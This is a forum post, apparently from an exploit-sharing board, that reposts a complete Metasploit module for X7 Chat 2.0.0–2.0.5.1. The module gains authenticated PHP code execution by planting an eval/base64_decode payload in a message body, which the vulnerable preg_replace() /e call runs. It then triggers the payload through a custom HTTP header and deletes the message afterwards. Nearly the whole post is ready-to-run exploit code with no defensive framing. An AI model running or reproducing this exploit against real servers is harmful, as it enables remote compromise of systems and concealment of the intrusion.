Jump to content
akkiliON

X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution

By akkiliON, in Exploituri

Recommended Posts

  • Active Members
akkiliON Collaborator

akkiliON

Posted
  • Active Members
Posted 


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
      'Description'    => %q{
        This module exploits a post-auth vulnerability found in X7 Chat versions
        2.0.0  up to 2.0.5.1. The vulnerable code exists on lib/message.php, which
        uses preg_replace() function with the /e modifier. This allows a remote
        authenticated attacker to execute arbitrary PHP code in the remote machine.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development
          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @ITsecurityco
        ],
      'References'     =>
        [
          # Using this URL because isn't nothing else atm
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'Oct 27 2014',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),
        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),
        OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
      ], self.class)
  end

  def check
    res = exec_php('phpinfo(); die();', true)

    if res && res.body =~ /This program makes use of the Zend/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exec_php(php_code, is_check = false)

    # remove comments, line breaks and spaces of php_code
    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')

    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
    while Rex::Text.encode_base64(payload_clean) =~ /=/
      payload_clean = "#{ payload_clean } "
    end
    payload_b64 = Rex::Text.encode_base64(payload_clean)

    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)

    print_status("Trying for version 2.0.2 up to 2.0.5.1")
    print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {
        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
      },
      'vars_get' => {
        # value compatible with 2.0.2 up to 2.0.5.1
        'act'     => 'user_cp',
        'cp_page' => 'msgcenter',
        'to'      => datastore['USERNAME'],
        'subject' => rand_text,
        'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
      }
    })

    unless res && res.code == 200
      print_error("Sending the message (#{ rand_text }) has failed")
      return false
    end

    if res.body =~ /([0-9]*)">#{ rand_text }/
      message_id = Regexp.last_match[1]
      user_panel = 'user_cp'
    else
      print_error("Could not find message (#{ rand_text }) in the message list")

      print_status("Retrying for version 2.0.0 up to 2.0.1 a1")
      print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, 'index.php'),
        'headers'  => {
          'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
        },
        'vars_get' => {
          # value compatible with 2.0.0 up to 2.0.1 a1
          'act'     => 'usercp',
          'cp_page' => 'msgcenter',
          'to'      => datastore['USERNAME'],
          'subject' => rand_text,
          'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
        }
      })

      unless res && res.code == 200
        print_error("Sending the message (#{ rand_text }) has failed")
        return false
      end

      if res.body =~ /([0-9]*)">#{ rand_text }/
        message_id = Regexp.last_match[1]
        user_panel = 'usercp'
      else
        print_error("Could not find message (#{ rand_text }) in the message list")
        return false
      end
    end

    print_status("Accessing message (#{ rand_text })")
    print_status("Sending payload in HTTP header '#{ rand_text }'")

    if is_check
      timeout = 20
    else
      timeout = 3
    end

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path, 'index.php'),
      'headers'   => {
        'Cookie'  => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
        rand_text => payload_b64,
      },
      'vars_get'  => {
        'act'     => user_panel,
        'cp_page' => 'msgcenter',
        'read'    => message_id,
      }
    }, timeout)

    res_payload = res

    print_status("Deleting message (#{ rand_text })")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {
        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
      },
      'vars_get' => {
        'act'     => user_panel,
        'cp_page' => 'msgcenter',
        'delete'  => message_id,
      }
    })

    if res && res.body =~ /The message has been deleted/
      print_good("Message (#{ rand_text }) removed")
    else
      print_error("Removing message (#{ rand_text }) has failed")
      return false
    end

    # if check return the response
    if is_check
      return res_payload
    else
      return true
    end
  end

  def exploit
    unless exec_php(payload.encoded)
      fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")
    end
  end
end

X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...